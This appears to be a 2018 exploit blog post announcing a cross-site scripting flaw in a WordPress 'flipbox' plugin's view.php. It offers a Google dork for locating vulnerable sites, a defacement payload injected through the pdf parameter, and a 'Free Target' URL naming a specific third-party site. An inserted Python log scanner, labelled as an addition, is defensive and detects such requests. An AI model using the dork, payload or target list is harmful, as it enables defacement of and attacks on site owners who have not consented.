Monday, July 9, 2018

WordPress Plugins flipbox Cross Site Scripting (XSS)


# Exploit Title: WordPress Plugins flipbox Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/flipbox
# Date: 09-07-2018
# Exploit Author: ./AkatsuChan
# Vendor Homepage: http://www.cooltimeline.com
# Tested on: Windows 7

Description:

The vulnerability is in view.php, where an attacker can inject code into the website.

PoC:

Use the exploit to inject into the website:

view.php?pdf=<html><h1>Hacked by YOur Nick</h1>

Example :

https://anotherweb.com/wp-content/plugins/flipbox/view.php?pdf=<html><h1>Hacked by YOur Nick</h1>
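
A detection sketch for the request pattern shown in the PoC above, as an added example that is not part of the original post: it scans web-server access logs for requests to the plugin's view.php whose pdf parameter decodes to markup. The combined log format, the sample log lines and the assumption that legitimate pdf values are plain document URLs are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Path and parameter name come from the PoC on this page.
PLUGIN_PATH = "/wp-content/plugins/flipbox/view.php"
PARAM = "pdf"
# Assumed log format: Apache/nginx "combined". Captures client, target, status.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# Assumption: legitimate pdf values are plain URLs, so markup characters are alertable.
MARKUP_RE = re.compile(r"[<>\"'`]|javascript:", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_lines):
    """Return (client, status, decoded value) for hits on view.php?pdf=<markup>."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(PLUGIN_PATH):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)
            if MARKUP_RE.search(value):
                hits.append((client, int(status), value))
    return hits


# Constructed sample lines (documentation IP ranges, harmless test strings).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jul/2018:10:00:01 +0000] "GET /wp-content/plugins/flipbox/view.php?pdf=%3Chtml%3E%3Ch1%3Etest%3C%2Fh1%3E HTTP/1.1" 200 512',
    '198.51.100.4 - - [09/Jul/2018:10:00:05 +0000] "GET /wp-content/plugins/flipbox/view.php?pdf=https%3A%2F%2Fexample.test%2Fuploads%2Fbrochure.pdf HTTP/1.1" 200 2048',
    '203.0.113.7 - - [09/Jul/2018:10:00:09 +0000] "GET /blog/wp-content/plugins/flipbox/view.php?pdf=%253Ch1%253Etest HTTP/1.1" 200 498',
    '192.0.2.10 - - [09/Jul/2018:10:00:12 +0000] "GET /index.php?s=%3Cb%3E HTTP/1.1" 200 900',
]
if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit means markup was sent to the endpoint; whether the response reflected it still has to be confirmed against the installed plugin version.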

Free Target :

https://ws312.com/wp-content/plugins/flipbox/view.php

OK, that's all from me this time :V